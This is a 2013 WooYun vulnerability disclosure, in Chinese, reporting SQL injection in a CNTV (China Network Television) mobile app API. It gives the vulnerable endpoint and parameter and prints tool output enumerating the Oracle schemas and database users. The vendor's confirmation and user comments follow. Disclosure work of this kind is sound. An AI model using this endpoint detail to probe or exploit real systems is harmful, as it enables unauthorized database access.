APP终结者10#中国网络电视台CNTV多款主要无线产品Sql注入多库 | WooYun-2013-46137

漏洞概要关注数(8) 关注此漏洞

缺陷编号： WooYun-2013-46137

漏洞标题： APP终结者10#中国网络电视台CNTV多款主要无线产品Sql注入多库

漏洞作者： zzR

提交时间： 2013-12-16 17:36

公开时间： 2014-01-30 17:37

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签： Oracle注入移动安全 APP云端sql注入

1人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-12-16：细节已通知厂商并且等待厂商处理中
2013-12-16：厂商已经确认，细节仅向厂商公开
2013-12-26：细节向核心白帽子及相关领域专家公开
2014-01-05：细节向普通白帽子公开
2014-01-15：细节向实习白帽子公开
2014-01-30：细节向公众公开

简要描述：

每天晚上准时收看新闻联播，接受教育，积极进步。在19:29:45的时候，主持人会说：获取更多资讯，敬请关注央视微博、微信、新闻客户端……
其实这个漏洞系列title不重要，重要是在这些产品中产生的各种各样类型的问题。
这是从一个比较边缘的产品出发，最后还是会涉及到核心产品。

详细说明：

从央视的几款主要产品出发，主要涉及央视新闻、CNTV、CNTV Cbox直播大全、5+VIP等都会有相同的app请求。

从一个不起眼的app出发IPandaCam，注入到核心产品数据

code 区域

GET /iphoneInterface/cntv/getVideoListBySort.json?vmsAlbum_id=VSET100167308821&page=1&pageSize=20 HTTP/1.1


Host: hot.app.cntv.cn


Proxy-Connection: keep-alive


Accept-Encoding: gzip, deflate


Accept: */*


Accept-Language: zh-cn


Connection: keep-alive


Pragma: no-cache


User-Agent: LovePanda/1.0.1 CFNetwork/672.0.8 Darwin/14.0.0

vmsAlbum_id存在注入

漏洞证明：

current db&user

dbs

code 区域

[*] APEX_030200


[*] CMSUSER


[*] CTXSYS


[*] EXFSYS


[*] MDSYS


[*] OLAPSYS


[*] SYS


[*] SYSTEM


[*] VMSUSER


[*] XDB

其中cmuser 174张表

users

code 区域

database management system users [36]:


[*] ANONYMOUS


[*] APEX_030200


[*] APEX_PUBLIC_USER


[*] APPQOSSYS


[*] CMSSEL


[*] CMSUSER


[*] CNTVSEARCH


[*] CTXSYS


[*] DBSNMP


[*] DIP


[*] EXFSYS


[*] FLOWS_FILES


[*] GOLDENGATE


[*] MDDATA


[*] MDSYS


[*] MGMT_VIEW


[*] OLAPSYS


[*] ORACLE_OCM


[*] ORDDATA


[*] ORDPLUGINS


[*] ORDSYS


[*] OUTLN


[*] OWBSYS


[*] OWBSYS_AUDIT


[*] SI_INFORMTN_SCHEMA


[*] SPATIAL_CSW_ADMIN_USR


[*] SPATIAL_WFS_ADMIN_USR


[*] SYS


[*] SYSMAN


[*] SYSTEM


[*] VMSSEL


[*] VMSUSER


[*] WMSYS


[*] XDB


[*] XS$NULL


[*] YXG

未继续深入

修复方案：

来乌云把爱带回家

版权声明：转载请注明来源 zzR@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2013-12-16 17:46

厂商回复：

非常感谢，我们将及时修复漏洞!

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2013-12-16 18:21 | 大胖子 ( 普通白帽子 | Rank:122 漏洞数:12 )
1

悄悄关注之

1# 回复此人
2013-12-16 18:30 | zzR ( 核心白帽子 | Rank:1408 漏洞数:125 | 东方红＊＊联盟欢迎你－0-)
0

@大胖子 @小胖子亲皂友？

2# 回复此人
2013-12-16 18:48 | 小胖子 ( 核心白帽子 | Rank:1878 漏洞数:154 | 不要患得患失，我羡慕你，但是我还是选择做...)
0

@大胖子尼玛打击伪劣产品人人有责！！！

3# 回复此人
2013-12-16 18:49 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | ☯☯☯☯☯☯☯☯☯☯)
0

@小胖子 @zzR @大胖子搞笑

4# 回复此人

登录后才能发表评论，请先登录。

WooYun.org

漏洞概要关注数(8) 关注此漏洞

缺陷编号： WooYun-2013-46137

漏洞标题： APP终结者10#中国网络电视台CNTV多款主要无线产品Sql注入多库

相关厂商：中国网络电视台

漏洞作者： zzR

提交时间： 2013-12-16 17:36

公开时间： 2014-01-30 17:37

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签： Oracle注入移动安全 APP云端sql注入

1人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 zzR@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价):

登陆后才能进行评分

评价

WooYun.org

漏洞概要 关注数(8) 关注此漏洞

缺陷编号： WooYun-2013-46137

漏洞标题： APP终结者10#中国网络电视台CNTV多款主要无线产品Sql注入多库

相关厂商： 中国网络电视台

漏洞作者： zzR

提交时间： 2013-12-16 17:36

公开时间： 2014-01-30 17:37

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 10

漏洞状态： 厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 help@wooyun.org

Tags标签： Oracle注入 移动安全 APP云端sql注入

1人收藏 收藏 var token=""; var id="46137"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 zzR@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

漏洞概要关注数(8) 关注此漏洞

相关厂商：中国网络电视台

危害等级：高

漏洞状态：厂商已经确认

Tags标签： Oracle注入移动安全 APP云端sql注入

1人收藏收藏
分享漏洞：

漏洞评价(共0人评价):

登陆后才能进行评分